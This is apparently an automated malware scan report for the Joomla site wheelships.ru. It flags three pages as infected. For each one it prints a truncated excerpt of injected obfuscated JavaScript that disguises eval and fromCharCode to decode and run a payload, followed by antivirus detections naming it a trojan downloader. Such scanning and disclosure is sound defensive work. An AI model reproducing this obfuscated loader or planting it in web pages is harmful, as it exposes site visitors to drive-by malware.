New scan:

Malware Scanner report for wheelships.ru

Malicious/Suspicious/Total urls checked
3/0/15
3 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://wheelships.ru/
200 OK
Content-Length: 43901
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(l
... 4883 bytes are skipped ...
t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,52/t,36/t,36/t,500/t];var mw="";ukxy=function(){return{e:eval}}().e;qf=ukxy(wij);var mv='';var phm="fro"+puny.getSeconds()+"arCode";phm=phm.replace(4,"mCh");hx=String[phm];for(var i=0;i<rpzc.length;i++){nqwy=qf(rpzc[i]);hx.call(nqwy);mv+=hx(nqwy);}
qf(mv);

Antivirus reports:

AntiVir
JS/Agent.ahf
Avast
JS:Iframe-AX [Trj]
Ikarus
Trojan-Downloader.HTML.Agent
AhnLab-V3
VBS/Agent
nProtect
Trojan.JS.Agent.EHF
K7AntiVirus
Riskware
Emsisoft
Trojan.JS.Agent.EHF (B)
Comodo
TrojWare.JS.Agent.mna
Kaspersky
Trojan-Downloader.HTML.Agent.wy
Microsoft
VirTool:JS/Obfuscator.CP
MicroWorld-eScan
Trojan.JS.Agent.EHF
Fortinet
HTML/Agent.WY!tr.dldr
Jiangmin
Trojan/Script.Gen
NANO-Antivirus
Trojan.Script.Agent.vvgrr
F-Secure
Trojan.JS.Agent.EHF
VIPRE
Trojan.JS.Obfuscator.m (v)
F-Prot
JS/IFrame.IC.gen
AVG
HTML/Framer
Norman
Agent
GData
Trojan.JS.Agent.EHF
Commtouch
JS/IFrame.IC.gen
BitDefender
Trojan.JS.Agent.EHF

http://wheelships.ru/media/system/js/caption.js
200 OK
Content-Length: 1721
Content-Type: application/x-javascript
clean
http://wheelships.ru/templates/KBVKS/script.js
200 OK
Content-Length: 8365
Content-Type: application/x-javascript
clean
http://wheelships.ru/index.php/joomla-overview
200 OK
Content-Length: 10781
Content-Type: text/html
clean
http://wheelships.ru/index.php/joomla-license
200 OK
Content-Length: 40131
Content-Type: text/html
clean
http://wheelships.ru/index.php/2009-02-08-13-08-47
200 OK
Content-Length: 16092
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(l
... 4883 bytes are skipped ...
t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,52/t,36/t,36/t,500/t];var mw="";ukxy=function(){return{e:eval}}().e;qf=ukxy(wij);var mv='';var phm="fro"+puny.getSeconds()+"arCode";phm=phm.replace(4,"mCh");hx=String[phm];for(var i=0;i<rpzc.length;i++){nqwy=qf(rpzc[i]);hx.call(nqwy);mv+=hx(nqwy);}
qf(mv);

Antivirus reports:

AntiVir
JS/Agent.ahf
Avast
JS:Iframe-AX [Trj]
Ikarus
Trojan-Downloader.HTML.Agent
AhnLab-V3
VBS/Agent
nProtect
Trojan.JS.Agent.EHF
K7AntiVirus
Riskware
Emsisoft
Trojan.JS.Agent.EHF (B)
Comodo
TrojWare.JS.Agent.mna
Kaspersky
Trojan-Downloader.HTML.Agent.wy
Microsoft
VirTool:JS/Obfuscator.CP
MicroWorld-eScan
Trojan.JS.Agent.EHF
Fortinet
HTML/Agent.WY!tr.dldr
Jiangmin
Trojan/Script.Gen
NANO-Antivirus
Trojan.Script.Agent.vvgrr
F-Secure
Trojan.JS.Agent.EHF
VIPRE
Trojan.JS.Obfuscator.m (v)
F-Prot
JS/IFrame.IC.gen
AVG
HTML/Framer
Norman
Agent
GData
Trojan.JS.Agent.EHF
Commtouch
JS/IFrame.IC.gen
BitDefender
Trojan.JS.Agent.EHF

http://wheelships.ru/index.php/2009-02-08-13-08-47/2009-02-10-19-04-26
200 OK
Content-Length: 19701
Content-Type: text/html
clean
http://wheelships.ru/index.php/2009-02-08-13-08-47/2009-02-10-18-52-50
200 OK
Content-Length: 22282
Content-Type: text/html
clean
http://wheelships.ru/index.php/2009-09-17-05-31-13
200 OK
Content-Length: 30460
Content-Type: text/html
clean
http://wheelships.ru/index.php/sura
200 OK
Content-Length: 11695
Content-Type: text/html
clean
http://wheelships.ru/index.php/sura/spusk
200 OK
Content-Length: 15945
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(l
... 4883 bytes are skipped ...
t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,52/t,36/t,36/t,500/t];var mw="";ukxy=function(){return{e:eval}}().e;qf=ukxy(wij);var mv='';var phm="fro"+puny.getSeconds()+"arCode";phm=phm.replace(4,"mCh");hx=String[phm];for(var i=0;i<rpzc.length;i++){nqwy=qf(rpzc[i]);hx.call(nqwy);mv+=hx(nqwy);}
qf(mv);

Antivirus reports:

AntiVir
JS/Agent.ahf
Avast
JS:Iframe-AX [Trj]
Ikarus
Trojan-Downloader.HTML.Agent
AhnLab-V3
VBS/Agent
nProtect
Trojan.JS.Agent.EHF
K7AntiVirus
Riskware
Emsisoft
Trojan.JS.Agent.EHF (B)
Comodo
TrojWare.JS.Agent.mna
Kaspersky
Trojan-Downloader.HTML.Agent.wy
Microsoft
VirTool:JS/Obfuscator.CP
MicroWorld-eScan
Trojan.JS.Agent.EHF
Fortinet
HTML/Agent.WY!tr.dldr
Jiangmin
Trojan/Script.Gen
NANO-Antivirus
Trojan.Script.Agent.vvgrr
F-Secure
Trojan.JS.Agent.EHF
VIPRE
Trojan.JS.Obfuscator.m (v)
F-Prot
JS/IFrame.IC.gen
AVG
HTML/Framer
Norman
Agent
GData
Trojan.JS.Agent.EHF
Commtouch
JS/IFrame.IC.gen
BitDefender
Trojan.JS.Agent.EHF

http://wheelships.ru/index.php/sura/visitholland
200 OK
Content-Length: 12869
Content-Type: text/html
clean
http://wheelships.ru/index.php/2009-02-08-11-32-44
200 OK
Content-Length: 12112
Content-Type: text/html
clean
http://wheelships.ru/media/system/js/validate.js
200 OK
Content-Length: 4246
Content-Type: application/x-javascript
clean
http://wheelships.ru/test404page.js
404 Not Found
Content-Length: 291
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: wheelships.ru

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 13 Jun 2014 01:12:06 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 13 Jun 2014 01:12:06 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: dtFzFVOtxzWj=OIbxMXePqaNp; expires=Sat, 14-Jun-2014 09:39:00 GMT
Set-Cookie: 80c96020a6edb5c4c7cfd908646a0fdc=rcv56pp5amp8u15f1s57cq85k3; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: wheelships.ru
Referer: http://www.google.com/search?q=wheelships.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=wheelships.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://wheelships.ru/

Result: wheelships.ru is not infected or malware details are not published yet.